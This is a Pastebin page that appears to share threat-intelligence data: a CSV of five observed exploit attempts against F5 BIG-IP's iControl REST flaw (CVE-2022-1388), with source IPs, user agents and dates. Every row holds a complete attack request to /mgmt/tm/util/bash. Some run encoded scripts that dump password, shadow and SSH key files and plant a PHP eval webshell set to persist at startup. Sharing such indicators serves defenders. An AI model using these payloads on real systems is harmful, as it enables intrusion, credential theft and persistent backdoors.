API tools faq
paste
internetweather

CVE-2022-1388 events from AS55286.csv

internetweather
May 19th, 2022
206
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.82 KB | None | 0 0
raw download clone embed print report
  1. Source IP,Country,User Agent,Payload,POST Data,Target Port,Tags,Date First Seen,Date Last Seen,Event Count
  2. 209.127.253.120,United States,Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101211 Firefox/3.6.13 (Palemoon/3.6.13) GTB7.1,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo Cm1vdW50IC1vICBydyxyZW1vdW50IC91c3I7CnJtIC1yZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yKi5jc3M7Cm1vdW50IC1vIHJvLHJlbW91bnQgL3VzcjsK|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-10T09:27:41Z,2022-05-10T09:27:41Z,1
  3. 144.168.221.206,United States,Baiduspider+(+http://www.baidu.com/search/spider.htm),POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22tar cJhf - /root/.ssh/ | base64 -w 0\x5C\x22\x22}""",8443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T18:48:18Z,2022-05-09T18:48:18Z,1
  4. 192.241.67.90,United States,Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22tar cJhf - /root/.ssh/ | base64 -w 0\x5C\x22\x22}""",2083,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T18:30:15Z,2022-05-09T18:30:15Z,1
  5. 144.168.158.166,United States,Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090410 Minefield/3.6a1pre,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo CmVjaG8gIj09PT09IjsgCmNhdCAvZXRjL2hvc3RuYW1lOyAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL2hvc3RzOyAgCmVjaG8gIj09PT09IjsgIApjYXQgL2V0Yy9wYXNzd2Q7ICAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL3NoYWRvdzsgIAplY2hvICI9PT09PSI7ICAKY2F0IC9ldGMvcmVzb2x2LmNvbmY7ICAKZWNobyAiPT09PT0iOyAgCmY1bWt1IC1mIDsgIAplY2hvICI9PT09PSI7ICAgCmY1bWt1IC1LOyAgCmVjaG8gIj09PT09IjsgIApmNW1rdSAtWjsgIAplY2hvICI9PT09PSI7ICAKbW91bnQgLW8gIHJ3LHJlbW91bnQgL3VzcjsKdGFyIHpjZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yNmY1M2M3YTZjNC5jc3MgL2NvbmZpZy8qIC9yb290Ly5iYXNoX2hpc3Rvcnk7CmVjaG8gIjw/cGhwIEBldmFsKGJhc2U2NF9kZWNvZGUoXCRfUE9TVFsnNmY1M2M3YTZjNCddKSk7IiA IC91c3IvbG9jYWwvd3d3L3h1aS9jb21tb24vY3NzLzZmNTNjN2E2YzRjc3MucGhwOwplY2hvICJlY2hvIFwiPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZShcXFwkX1BPU1RbJzZmNTNjN2E2YzQnXSkpO1wiID4gL3Vzci9sb2NhbC93d3cveHVpL2NvbW1vbi9jc3MvNmY1M2M3YTZjNGNzcy5waHAiID4 IC9jb25maWcvc3RhcnR1cDsKbW91bnQgLW8gcm8scmVtb3VudCAvdXNyOwo=|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",2083,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T07:25:40Z,2022-05-09T07:25:40Z,1
  6. 144.168.218.38,United States,Mozilla/4.76 [en] (Win95; U),POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo CmVjaG8gIj09PT09IjsgCmNhdCAvZXRjL2hvc3RuYW1lOyAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL2hvc3RzOyAgCmVjaG8gIj09PT09IjsgIApjYXQgL2V0Yy9wYXNzd2Q7ICAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL3NoYWRvdzsgIAplY2hvICI9PT09PSI7ICAKY2F0IC9ldGMvcmVzb2x2LmNvbmY7ICAKZWNobyAiPT09PT0iOyAgCmY1bWt1IC1mIDsgIAplY2hvICI9PT09PSI7ICAgCmY1bWt1IC1LOyAgCmVjaG8gIj09PT09IjsgIApmNW1rdSAtWjsgIAplY2hvICI9PT09PSI7ICAKbW91bnQgLW8gIHJ3LHJlbW91bnQgL3VzcjsKdGFyIHpjZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yZmU2MzM2MmRhNS5jc3MgL2NvbmZpZy8qIC9yb290Ly5iYXNoX2hpc3Rvcnk7CmVjaG8gIjw/cGhwIEBldmFsKGJhc2U2NF9kZWNvZGUoXCRfUE9TVFsnZmU2MzM2MmRhNSddKSk7IiA IC91c3IvbG9jYWwvd3d3L3h1aS9jb21tb24vY3NzL2ZlNjMzNjJkYTVjc3MucGhwOwplY2hvICJlY2hvIFwiPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZShcXFwkX1BPU1RbJ2ZlNjMzNjJkYTUnXSkpO1wiID4gL3Vzci9sb2NhbC93d3cveHVpL2NvbW1vbi9jc3MvZmU2MzM2MmRhNWNzcy5waHAiID4 IC9jb25maWcvc3RhcnR1cDsKbW91bnQgLW8gcm8scmVtb3VudCAvdXNyOwo=|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T06:06:28Z,2022-05-09T06:06:28Z,1
  7.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!